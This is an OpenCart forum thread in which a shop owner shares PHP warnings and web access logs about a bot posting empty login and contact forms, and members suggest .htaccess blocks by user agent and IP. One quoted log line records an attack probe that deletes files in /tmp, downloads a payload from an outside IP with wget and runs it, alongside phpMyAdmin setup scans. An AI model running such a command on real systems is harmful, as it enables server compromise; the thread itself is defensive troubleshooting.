2022-08-30 1:53:28 - PHP Warning: Undefined array key "password" in /home/****/public_html/catalog/controller/account/login.php on line 174
2022-08-30 1:53:28 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 177
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 160
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 167
2022-08-30 1:53:36 - PHP Warning: Undefined array key "name" in /home/****/public_html/catalog/controller/information/contact.php on line 145
2022-08-30 1:53:36 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/information/contact.php on line 149
2022-08-30 1:53:36 - PHP Warning: Undefined array key "enquiry" in /home/****/public_html/catalog/controller/information/contact.php on line 153
2022-08-30 13:20:23 - PHP Warning: file_get_contents(https://www.google.com/recaptcha/api/siteverify?secret=****&response=&remoteip=91.211.89.207): Failed to open stream: Connection timed out in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 27
2022-08-30 13:20:23 - PHP Warning: Trying to access array offset on value of type null in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 31
Dedication and passion goes to those who are able to push and merge a project.
Regards,
Straightlight
Programmer / Opencart Tester
One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
How would I narrow it down to an ext? It is a dedi server and allows re-captcha on html pages I have built. Thank you kindly.paulfeakins wrote: ↑Wed Aug 31, 2022 6:22 pmProbably various extensions.
One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.
I suspected this as well. I will see if I can find matching times. Thanks!ADD Creative wrote: ↑Wed Aug 31, 2022 6:38 pmCould be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
Here is activity at the time of some of them. Any of this seem like the culprit?ADD Creative wrote: ↑Wed Aug 31, 2022 6:38 pmCould be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
104.248.8.32 - - [21/Sep/2022:09:33:08 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
40.94.29.194 - - [21/Sep/2022:09:34:25 -0500] "GET / HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
59.55.189.71 - - [21/Sep/2022:09:44:12 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 301 310 "-" "Hello, world"
136.243.220.210 - - [21/Sep/2022:09:46:03 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
103.147.64.43 - - [21/Sep/2022:09:48:47 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
80.94.92.239 - - [21/Sep/2022:09:51:29 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.66.209 - - [21/Sep/2022:09:54:22 -0500] "GET / HTTP/1.1" 301 231 "-" "curl/7.64.1"
107.173.40.211 - - [21/Sep/2022:09:54:25 -0500] "GET / HTTP/1.1" 301 239 "-" "python-requests/2.24.0"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/pma/scripts/setup.php HTTP/1.0" 301 256 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/mysql/scripts/setup.php HTTP/1.0" 301 258 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 263 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/db/scripts/setup.php HTTP/1.0" 301 255 "-" "-"
107.167.35.138 - - [21/Sep/2022:09:57:46 -0500] "GET / HTTP/1.1" 301 239 "-" "-"
Thank you!ADD Creative wrote: ↑Thu Sep 22, 2022 12:21 amYou would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in you logs. That may be the wrong log file as all the responses are all 301 redirects, suggesting that is for http and not https.
You were right. I grabbed the most recent ones from the https version.
Here is the error in opencart:
Here are the logs for that time:2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "password" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 177
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:58 - PHP Warning: Undefined array key "name" in /home/*/public_html/catalog/controller/information/contact.php on line 145
2022-09-21 13:27:58 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/information/contact.php on line 149
2022-09-21 13:27:58 - PHP Warning: Undefined array key "enquiry" in /home/*/public_html/catalog/controller/information/contact.php on line 153
Here is what I think is the offender?:142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:54 -0500] "GET /redacted HTTP/1.1" 200 13045 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/jquery/jquery-2.1.1.min.js HTTP/1.1" 200 29497 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 19882 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/stylesheet.css HTTP/1.1" 200 3507 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 7053 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/wide-grid.css HTTP/1.1" 200 347 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.css HTTP/1.1" 200 6863 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/vendor/isenselabs/isearch/isearch.css HTTP/1.1" 200 418 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu.css?v=30 HTTP/1.1" 200 3815 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style.css?v HTTP/1.1" 200 551 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style-2.css?v HTTP/1.1" 200 - "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.js HTTP/1.1" 200 1877 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 9745 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/vendor/isenselabs/isearch/isearch.js HTTP/1.1" 200 5339 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu-responsive.js?v=30 HTTP/1.1" 200 1356 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/jquery.hoverIntent.minified.js HTTP/1.1" 200 628 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/js_params.js?v HTTP/1.1" 200 208 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/bloodhound.min.js?v HTTP/1.1" 200 4476 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/typeahead.jquery.min.js?v HTTP/1.1" 200 8988 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/live_search.min.js?v HTTP/1.1" 200 1343 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/common.js HTTP/1.1" 200 3029 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/DFSLOGO.jpg HTTP/1.1" 200 26898 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=extension/module/supermenu/css HTTP/1.1" 200 99 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/LeftBanner.jpg HTTP/1.1" 200 47856 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1050-228x228.png HTTP/1.1" 200 12505 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1180-228x228.png HTTP/1.1" 200 7872 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted6470-228x228.png HTTP/1.1" 200 12716 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3410-228x228.png HTTP/1.1" 200 6535 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted345-228x228.png HTTP/1.1" 200 4200 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "redacted/catalog/view/javascript/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/UL366-228x228.png HTTP/1.1" 200 4676 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3100-228x228.png HTTP/1.1" 200 14316 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3110-228x228.png HTTP/1.1" 200 9147 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3340-228x228.png HTTP/1.1" 200 6880 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=information/contact HTTP/1.1" 200 9793 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted5150-228x228.png HTTP/1.1" 200 11959 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/cart.png HTTP/1.1" 404 83180 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig
I thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:ADD Creative wrote: ↑Thu Sep 22, 2022 3:45 amDoes look like at bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other then that change the code in the controller to at least stop the error log filling up.
Code: Select all
#Redirect empty user agent
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
Thank you sir. I will look into that right now.
Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig
That will not work as the bot does set a user agent. To block that version of Chrome.SScott wrote: ↑Thu Sep 22, 2022 7:50 pmI thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:
Code: Select all
#Redirect empty user agent RewriteCond %{HTTP_USER_AGENT} ^$ RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
Code: Select all
SetEnvIfNoCase User-Agent "^.*Chrome/85\.0\.4183\.121.*$" bad_bot
Deny from env=bad_bot
Code: Select all
SetEnvIfNoCase User-Agent "^.*Chrome/[1-8][0-9]\..*$" bad_bot
Deny from env=bad_bot
I installed a reCaptcha on the admin side and deleted the .htaccess file and got hammered hard so I re-uploaded the file to stop it.
Now my problem is the normal customer login is getting hammered. There does not seem to be a solution to this. I can't block every single IP, this bandid only last a few seconds and the move to another IP. I don't know what to do other than living with it. I would gladly pay for a real solution.
2023-03-28 9:57:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115
2023-03-28 10:42:37 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115
2023-03-28 10:42:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115
this goes on to infinity but the post limit is 20,000 characters
viewtopic.php?t=230843
viewtopic.php?t=225771
Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig
Yes sir it is. I tried your htaccess method and it did not seem to work so I tried adapting just the RewriteRule to mine that I am using and that did not work so not sure what I did wrong. The way I have it now is working but it is a pain when the girl who does CS uses her phone and is away and I am not near anything to add her new IP.JNeuhoff wrote: ↑Wed Mar 29, 2023 5:31 am@SScott : What's exactly in your access.log ? It could be similar to what was discussed in this forum thread.
I am using this for the admin page (and the customer login page I installed an extension the use reCaptcha. I tried installing V3 but could not get it to work so went back to V2 and did the option for invisible)
Code: Select all
RewriteCond %{REMOTE_ADDR} 0.0.0.0 [OR]
RewriteCond %{REMOTE_ADDR} 0.0.0.1
RewriteRule .* - [L] #do notthing
RewriteRule .* https://www.websitehere.com/ [R=302,L]
Anyway, what's in your server's access.log ? That info might help to work out a proper .htaccess content.
Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig
Users browsing this forum: NicNie and 225 guests